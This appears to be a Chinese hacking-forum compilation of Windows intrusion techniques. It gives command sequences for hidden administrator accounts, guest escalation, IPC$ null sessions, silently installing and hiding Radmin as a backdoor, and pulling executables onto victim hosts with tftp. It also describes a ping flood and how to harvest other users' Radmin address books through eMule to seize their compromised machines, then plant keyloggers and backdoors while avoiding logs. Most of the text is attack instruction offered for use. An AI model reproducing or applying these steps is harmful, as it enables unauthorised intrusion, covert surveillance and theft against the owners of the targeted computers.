知道黑客的IP，如何反击他

通过DOS反向连接，然后计算机管理：command MMC

结束进程：NET SHARE

查看版本：ver

查看中端(服务）：net start

查看文件：dir

加用户：c:\winnt\system32net user adminserver$ admin /add

提权限：net localgroup administrators adminserver$ /add

211.38.172.2 2180

查看用户net user

远程连接到主机CMD命令：telnet 主机IP

踢人：logoff ID

查看当前人：query user

打开telnet:net start telnet

telnet连接工具：OpenTelnet

删除共享： net share c$=c:\

删除共享： net share c$ /del

启用GUEST：net user guest /active:yes

为GUEST设密码：net user guest 888888

提升到管理员：net localgroup "Administrators" guest /add

超级用户隐藏器:c:\door adminserver$:admin

克隆帐号：ca \\IP 你建立的帐号 密码 肉机默认帐号 密码

ca \\127.0.0.1 adminserver$ admin adminserver admin

完全禁止系统模认工享

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\DelegateFolders\{59031a47-3f72-44a7-89c5-5595fe6b30ee}]

3389替换服务-----------------------

中修改[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]

c:\winnt\system32\copy termsrv.exe service.exe

c:\winnt\system32\cd..

c:\winnt\sc \\127.0.0.1 config Alerter binpath= c:\winnt\system32\service.exe

端口转向：f:\web\ "c:\fpipe.exe -v -l 开放的端口 -r 要转向的端口 ip"

使用空口令连接:

net use \\对方IP\ipc$ "" /user:"administrator"

(在上传文件的目录下)远程复制文件:

c:\radminnet use \\a-01\ipc$ "12345" /user:administrator

c:\ramdincopy r_server.exe \\a-01\admin$\system32

c:\ramdincopy radmin.reg \\a-01\admin$\sytem32

在对方CMD下：

c:\winnt\system32\regedit /s radmin.reg

c:\winnt\system32\r_server.exe /install /silenec

net start r_server

copy r_server.exe \\对方IP\admin$\system32

c:\opentelnet.exe \\IP ADMINISTRATOR "" 0 90

copy 文件名 \\IP\admin$\system32

进入对方CMD:

c:\opentelnet.exe \\Ip administrator "" 0 90

登陆CMD:

c:\telnet IP 90

安装RADMIN:

c:\winnt\system32\

r_server /install silence

c:\winnt\system32\

r-server

导入注册表:

c:\winnt\system32\regedit.exe /s aaa.reg

看端口:

c:\winnt\system32\

netstat -an

改端口:

c:\winnt\system32\

r_server.exe /port:1024 /pass:1234 /save /silence

起动服务:

c:\winnt\system32\net start r_server

隐藏文件:

c:\winnt\system32\attrib.exe +h r_server.exe +h

%systemroot$\system32

看看共享开了没有,没有的话把共享开开

c:\winnt\system32net share

清单是空的。

c:\winnt\system32net share ipc$

命令成功完成。

c:\winnt\system32net share admin$

命令成功完成。

注册表运行命令

regedit

查看端口：netstat-n

SA传送文件TFTP

先在本机开tftp服务 sqlexec

tftp-i IP get windxp.exe c:\windows\system32\com\windxp.exe

℃冰河℃ 2007-01-02 19:50

net use \\ip\ipc$ " " /user:" " 建立IPC空链接

net use \\ip\ipc$ "密码" /user:"用户名" 建立IPC非空链接

net use h: \\ip\c$ "密码" /user:"用户名" 直接登陆后映射对方C：到本地为H:

net use h: \\ip\c$ 登陆后映射对方C：到本地为H:

net use \\ip\ipc$ /del 删除IPC链接

net use h: /del 删除映射对方到本地的为H:的映射

net user 用户名　密码　/add 建立用户

net user guest /active:yes 激活guest用户

net user 查看有哪些用户

net user 帐户名 查看帐户的属性

net localgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意：administrator后加s用复数

net start 查看开启了哪些服务

net start 服务名　 开启服务；(如:net start telnet， net start schedule)

net stop 服务名 停止某服务

net time \\目标ip 查看对方时间

net time \\目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息

net view 查看本地局域网内开启了哪些共享

net view \\ip 查看对方局域网内开启了哪些共享

net config 显示系统网络设置

net logoff 断开连接的共享

net pause 服务名 暂停某服务

net send ip "文本信息" 向对方发信息

net ver 局域网内正在使用的网络连接类型和信息

net share 查看本地开启的共享

net share ipc$ 开启ipc$共享

net share ipc$ /del 删除ipc$共享

net share c$ /del 删除C：共享

net user guest 12345 用guest用户登陆后用将密码改为12345

net password 密码 更改系统登陆密码

netstat -a 查看开启了哪些端口,常用netstat -an

netstat -n 查看端口的网络连接情况，常用netstat -an

netstat -v 查看正在进行的工作

netstat -p 协议名 例：netstat -p tcq/ip 查看某协议使用情况（查看tcp/ip协议使用情况）

netstat -s 查看正在使用的所有协议使用情况

nbtstat -A ip 对方136到139其中一个端口开了的话，就可查看对方最近登陆的用户名（03前的为用户名）-注意：参数-A要大写

tracert -参数 ip(或计算机名) 跟踪路由（数据包），参数：“-w数字”用于设置超时间隔。

ping ip(或域名) 向对方主机发送默认大小为32字节的数据，参数：“-l[空格]数据包大小”；“-n发送数据次数”；“-t”指一直ping。

ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)

ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址，ipconfig可用参数“/all”显示全部配置信息

tlist -t 以树行列表显示进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内)

kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内)

del -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件，/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件，“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件

del /S /Q 目录 或用：rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。（二个命令作用相同）

move 盘符\路径\要移动的文件名　存放移动文件的路径\移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖

fc one.txt two.txt 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中，" "和" " 是重定向命令

at id号 开启已注册的某个计划任务

at /delete 停止所有计划任务，用参数/yes则不需要确认就直接停止

at id号 /delete 停止某个已注册的计划任务

at 查看所有的计划任务

at \\ip time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机

finger username @host 查看最近有哪些用户登陆

telnet ip 端口 远和登陆服务器,默认端口为23

open ip 连接到IP（属telnet登陆后的命令）

telnet 在本机上直接键入telnet 将进入本机的telnet

copy 路径\文件名1　路径\文件名2 /y 复制文件1到指定的目录为文件2，用参数/y就同时取消确认你要改写一份现存目录文件

copy c:\srv.exe \\ip\admin$ 复制本地c:\srv.exe到对方的admin下

cppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件，注：2st.txt文件头要空三排，参数：/b指二进制文件，/a指ASCLL格式文件

copy \\ip\admin$\svv.exe c:\ 或:copy\\ip\admin$\*.* 复制对方admini$共享下的srv.exe文件（所有文件）至本地C：

xcopy 要复制的文件或目录树　目标地址\目录名 复制文件和目录树，用参数/Y将不提示覆盖相同文件

tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:\server.exe 登陆后，将“IP”的server.exe下载到目标主机c:\server.exe 参数：-i指以二进制模式传送，如传送exe文件时用，如不加-i 则以ASCII模式（传送文本文件模式）进行传送

tftp -i 对方IP　put c:\server.exe 登陆后，上传本地c:\server.exe至主机

ftp ip 端口 用于上传文件至服务器或进行文件操作，默认端口为21。bin指用二进制方式传送（可执行文件进）；默认为ASCII格式传送(文本文件时)

route print 显示出IP路由，将主要显示网络地址Network addres，子网掩码Netmask，网关地址Gateway addres，接口地址Interface

arp 查看和处理ARP缓存，ARP是名字解析的意思，负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息

start 程序名或命令 /max 或/min 新开一个新窗口并最大化（最小化）运行某程序或命令

mem 查看cpu使用情况

attrib 文件名(目录名) 查看某文件（目录）的属性

attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档，只读，系统，隐藏 属性；用＋则是添加为某属性

dir 查看文件，参数：/Q显示文件及目录属系统哪个用户，/T:C显示文件创建时间，/T:A显示文件上次被访问时间，/T:W上次被修改时间

date /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间，而不必输入新日期和时间

set 指定环境变量名称=要指派给变量的字符 设置环境变量

set 显示当前所有的环境变量

set p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量

pause 暂停批处理程序，并显示出：请按任意键继续....

if 在批处理程序中执行条件处理（更多说明见if命令及变量）

goto 标签 将cmd.exe导向到批处理程序中带标签的行（标签必须单独一行，且以冒号打头，例如：“：start”标签）

call 路径\批处理文件名 从批处理程序中调用另一个批处理程序 （更多说明见call /?）

for 对一组文件中的每一个文件执行某个特定命令（更多说明见for命令及变量）

echo on或off 打开或关闭echo，仅用echo不加参数则显示当前echo设置

echo 信息 在屏幕上显示出信息

echo 信息 pass.txt 将"信息"保存到pass.txt文件中

findstr "Hello" aa.txt 在aa.txt文件中寻找字符串hello

find 文件名 查找某文件

title 标题名字 更改CMD窗口标题名字

color 颜色值 设置cmd控制台前景和背景颜色；0＝黑、1＝蓝、2＝绿、3＝浅绿、4＝红、5＝紫、6＝黄、7=白、8=灰、9=淡蓝、A＝淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白

prompt 名称 更改cmd.exe的显示的命令提示符(把C:\、D:\统一改为：EntSky\ )

print 文件名 打印文本文件

ver 在DOS窗口下显示版本信息

winver 弹出一个窗口显示版本信息（内存大小、系统版本、补丁版本、计算机名）

format 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFS ,例：Format D: /FS:NTFS

md　目录名 创建目录

replace 源文件　要替换文件的目录 替换文件

ren 原文件名　新文件名 重命名文件名

tree 以树形结构显示出目录，用参数-f 将列出第个文件夹中文件名称

type 文件名 显示文本文件的内容

more 文件名 逐屏显示输出文件

doskey 要锁定的命令＝字符

doskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行，重新调用win2k命令，并创建宏)。如：锁定dir命令：doskey dir=entsky (不能用doskey dir=dir)；解锁：doskey dir=

taskmgr 调出任务管理器

chkdsk /F D: 检查磁盘D并显示状态报告；加参数/f并修复磁盘上的错误

tlntadmn telnt服务admn,键入tlntadmn选择3，再选择8,就可以更改telnet服务默认端口23为其它任何端口

exit 退出cmd.exe程序或目前，用参数/B则是退出当前批处理脚本而不是cmd.exe

path 路径\可执行文件的文件名 为可执行文件设置一个路径。

cmd 启动一个win2K命令解释窗口。参数：/eff、/en 关闭、开启命令扩展；更我详细说明见cmd /?

regedit /s 注册表文件名 导入注册表；参数/S指安静模式导入，无任何提示；

regedit /e 注册表文件名 导出注册表

cacls 文件名　参数 显示或修改文件访问控制列表（ACL）——针对NTFS格式时。参数：/D 用户名:设定拒绝某用户访问；/P 用户名:perm 替换指定用户的访问权限；/G 用户名:perm 赋予指定用户访问权限；Perm 可以是: N 无，R 读取， W 写入， C 更改(写入)，F 完全控制；例：cacls D:\test.txt /D pub 设定d:\test.txt拒绝pub用户访问。

cacls 文件名 查看文件的访问用户权限列表

REM 文本内容 在批处理文件中添加注解

netsh 查看或更改本地网络配置情况

它是用来检查网络是否通畅或者网络连接速度的命令。作为一个生活在网络上的管理员或者黑客来说，ping命令是第一个必须掌握的DOS命令，它所利用的原理是这样的：网络上的机器都有唯一确定的IP地址，我们给目标IP地址发送一个数据包，对方就要返回一个同样大小的数据包，根据返回的数据包我们可以确定目标

主机的存在，可以初步判断目标主机的操作系统等。下面就来看看它的一些常用的操作。先看看帮助吧，在

DOS窗口中键入：ping /? 回车，出现如图1所示的帮助画面。在此，我们只掌握一些基本的很有用的参数就可以了。

-t 表示将不间断向目标IP发送数据包，直到我们强迫其停止。试想，如果你使用100M的宽带接入，而目标

P是56K的小猫，那么要不了多久，目标IP就因为承受不了这么多的数据而掉线，呵呵，一次攻击就这么简单的实现了。 够干死他了。不要用于其他目的哦！！！！！

带 rpb 的文件怎么打开？？

radmin.rpb文件是在安装radmin3.0及其后续版本中，只用使用过radmin客户端，radmin控制端就会自动在系统中生成一个唯一的radmin.rpb文件!

1．emule，emule俗称“电驴”，跟flashget，迅雷，变态等为同类软件，其最大特点是搜索方便。本文用到它的地方就是其搜索功能和下载功能。

2．radmin客户端，radmin客户端是用来连接服务器端实施控制的工具。在radmin中只需要导入radmin地址薄，并输入正确的口令即可对肉鸡进行控制。

（二）搜索radmin.rpb文件

1．什么是radmin.rpb文件

在安装radmin3.0及其后续版本中，只用使用过radmin客户端，radmin控制端就会自动在系统中生成一个唯一的radmin.rpb文件（图1），其文件路径为：“c:\documents and settings\administrator\application data\radmin”。

注意：系统“application data”目录默认情况为隐藏，因此如果想要查看，必须通过“文件夹选项”，设置显示“系统受保护文件”以及“显示所有文件以及文件夹”。如果各位黑友在“工作”过程中，“偶然”发现有这个文件，哈哈，恭喜你发财了。radmin.rpb文件主要包含ip地址以及端口号，通常如果我们使用radmin远程控制软件，一般都有保留肉鸡ip以及口令在客户端上的习惯，试想如果您有很多很多肉鸡，每一次都查找或者通过记忆来，是非常麻烦，而且不可能一下子全记住。

2．搜索radmin.rpb文件

emule（电驴）用户共享文件夹来实行下载积分，共享的越多，也就贡献值越多，下载速度也越快，很多用户在使用时，一不小心将不该共享的文件夹给共享了，或者用户在共享文件时对一些配置文件不了解，认为不会造成什么危险，因此理所当然的共享。使用“电驴”搜索radmin.rpb文件时，必须要求能够连接上emule服务器，默认情况下，一运行emule程序，大概几十秒钟，程序会自动连接上emule服务器。在emule中使用“搜索”功能，在“名字”中输入“radmin.rpb”、“.rpb”、“rpb”，在搜索结果中去查找包含“radmin.rpb”字样的条目，双击进行下载。

3．等待radmin.rpb文件

呵呵，等待“radmin.rpb”文件是一个既痛苦又快乐的过程，有时候运气好，一会儿就会下载到本地，毕竟radmin.rpb这个文件不会太大，一般几k到几十k大小，当然越大越好。emule下载文件时，如果没有指定下载文件的目录，则默认下载到emule安装程序下面的“incoming”文件夹中。可以通过“共享文件”－“下载的文件”查看文件是否已经成功下载。

（三）导入radmin.rpb文件到radmin客户端

运行radmin客户端程序，选择“工具”-“导入地址薄”从emule的下载目录中将本例中下载的“radmin3phonebook.rpb”文件导入radmin（图4，图5），导入成功后可以看到很多乱码，这些乱码主要是因为语言的不一样，可以不用管它，通过radmin的查找主机是否在线，依次查看其中的肉鸡，如果肉鸡是连通的就用该肉鸡ip后面括号中的字符串（口令）进行测试，呵呵，找到了不少肉鸡。

（四）实施控制

实施控制部分，很多朋友都懂，但是笔者还是想说几句，上去以后不要急于安装其它马儿，如果搞的太匆忙，容易水土不服而夭折，可以参考的做法是先看看情况，装一个键盘嗅探器，看看计算机的主人都干些什么，安全感强不强，当然先装一个后门也是不是不可以，万一跑了不是很可惜嘛，在确认没有什么“危险”时，可以装后门，挂马啦，渗透控制等等。

（五）结束语

为了阐述其过程，笔者罗里罗嗦了半天，本质上非常简单，没有什么技术，就是找到radmin.rpb，然后导入radmin客户端，通过用户自己保留的口令进行测试。通过这种方法获取的肉鸡质量比较高，口令一般都不会是弱口令，因此一旦成功控制以后，一定要小心，然后才能有较大的收获。笔者通过这个方法进行扩展，曾经一下子控制了几个服务器集群。本文主要想告诉大家在黑客技术中，网络安全是相对的，网络攻防也是相对的，成功的攻破一个网络有时候也有偶然的机会，关键就是思维的创新.

希望这个对你有帮助!

Radmin V3.2 Remote Control 使用方法

关于radmin

radmin

是远程控制软件，可以远程管理公司或个人计算机实现远程办公。可以进行完全控制，屏幕监视，文件管理，远程DOS操作，等功能。操作简单，容易上手，只需要被控制主机执行服务端，安装服务，设置好连接端口和密码，您就可以利用控制端进行远程控制。

远程管理软件Radmin下载的地址是：http：//，软件大小为1.31MB。天空也有.Radmin的安装非常简单，下载完毕后双击即可直接运行。

Radmin的特点

1、程序体积小巧，并且安装简单、配置容易。

2、运行速度快，在10Mbps局域网的测试中，它比流行的VNC(Virtual

Network

Computing)要快，也超过了PcAnywhere。

3、在功能上，Radmin支持被控端以服务的方式运行、支持多个连接和IP过滤(即允许特定的IP控制远端机器)、个性化的文件互传、远程关机、支持高分辨率模式、基于Windows

NT的安全支持及密码保护以及提供日志文件支持等。

4、在安全性方面，Radmin支持Windows

NT/2000用户级安全特性，您可以将远程控制的权限授予特定的用户或者用户组。Radmin将以加密的模式工作，所有的数据(包括屏幕影像、鼠标和键盘的移动)都使用128位强加密算法加密；服务器端会将所有操作写进日志文件，以便于事后查询，服务器端有IP过滤表，对IP过滤表以外的控制请求将不予响应。

5、设置简单且刷新速度快。Radrain充分利用了网络的传输效率，在远程机上控制Windows

2000

Server服务器，你的感觉像是在本地操纵自己的计算机一样。

radmin的使用教程

第一章

Radmin的初步设置

首先我们需要下载Radmin2.1版的安装程序，选择2.1版，因为它比较成熟可靠。由于是官方认可的软件，所以只要在百度搜索“Radmin2.1

破解”即可。注意破解二字，要有注册码的！这里因为不想盗链，所以没直接给出下载地址，请大家自己搜索。不推荐下载影子版。一是，影子版解压缩时可能会被杀毒软件查杀；二是，影子版是完成品，不适合初学者，毕竟自己多做些基础工作，可以打下扎实的基本功。

下载后，安装。最好你的系统是W2K，原因就不多说了。安装完成后，选择Radmin的设置---选项。这时，你会看到弹出一个选项窗口。下面我们逐个介绍窗口中选项的功能。

首先是IP过滤。对新人而言，我是不建议设置IP过滤的，理由是尽量减少自己暴露的信息。所以，这个选项我们跳过。

其次是端口，默认的端口是4899。我们可以改一下，具体用哪个端口随自己喜好，可以随便编，但注意不要使用139，445，3389，4899这样声名在外的端口，即使肉鸡嫩，你就不怕别的老大抢了你的肉鸡？？如果不懂哪些端口是做什么用的，可以发邮件给我，我会将详细的资料发给你。

然后就是隐藏托盘图表的选项了，不想被肉鸡的主人看见托盘有个不怀好意的图标在跟他奸笑的话，那就点上吧。

使用日志记录，日志文件名不要选。会留痕迹的哦！

连接确认也不要理它，价值不大。

选项OK了，我们再Radmin的设置---设置口令，就是密码。内容自己决定。建议不要设置暴露自己信息的内容。。呵呵

都设置好了，我们就开始安装服务吧。方法是Radmin的设置---安装服务。点一下就可以了^_^

第二章

木马的制作

首先，是在安装目录下找到这3个文件。"AdmDll.dll"

"r_server.exe"

"raddrv.dll"把它们复制，粘贴到安全的地方。

然后，是导出注册表，方法是：开始----运行----输入regedit----在打开的注册表编辑器里找到HKEY_LOCAL_MACHINE----在该项目中找到SOFTWARE项----在这个项目里，我们看到一个熟悉的名字Radmin，还等什么，点击选择。在注册表编辑器的工具栏里，就是左上脚，有一个注册表(R)，看到吗？点击---导出注册表文件---注意保存的文件名“radmin.reg”，怎么样，你导出来了吗？

现在有了上面2步准备的4个文件，我们的木马就已经OK了。简单吧！

忘记强调，做好了木马，最后要注意移除服务哦。原因。。。呵呵

第三章

控制台的安装

建议删除刚才安装radmin2.1版本，重新下载安装radmin3.0，3.0版的画面细致，性能稳定。上面不安装3.0版的原因是，这个版现在只有控制台，没有服务端。以后推出的话，我会补充新的教程。

如果不想安装，直接使用2.1的radmin查看器就可以了。

第四章

木马的安装

把作为木马的4个文件上传到肉鸡上了，方法别的版块会详细介绍。建议上传到SYSTEM32，因为这里文件比较多，嘿嘿。上传以后，DOS环境在SYSTEM32目录下，运行以下3个命令，注意参数！

regedit

/s

radmin.reg

(导入注册表）

r_server

/install

/silence

(安装radmin,注意参数/silence)

net

start

r_server

(启动radmin)

强调下，参数/silence是取消安装画面用的，不加，肉鸡会看见什么呢？呵呵。。呵呵。。。

另外，你也可以自己写一个批处理文件自动执行，甚至制作一个exe，这个就是个人的发挥了。

第五章

连接肉鸡

运行控制台以后，Connection-(连接)---Connect

to(连接到)----填写I肉鸡P地址，第一次连接的话，建议只选择View

Only(只查看)，以后可以根据需要，选择Full

Control(完全控制)。

当然，不要忘记，把端口改成刚才自己设定的哦。

就这样了。

消息来源：YES黑客联盟

怎么才能远程侵入别人的电脑

细说不可能，给你说一下一般大体步骤，具体的到大型的黑客网站有免费教程。大虾们:扫描漏洞→利用漏洞获取权限→成功入侵。(过程中有可能使用小马)小虾们:种植木马→获取控制权限→成功入侵。走时别忘了清除痕迹。入侵不是一朝一夕的事，慢慢学吧，别做坏事哦！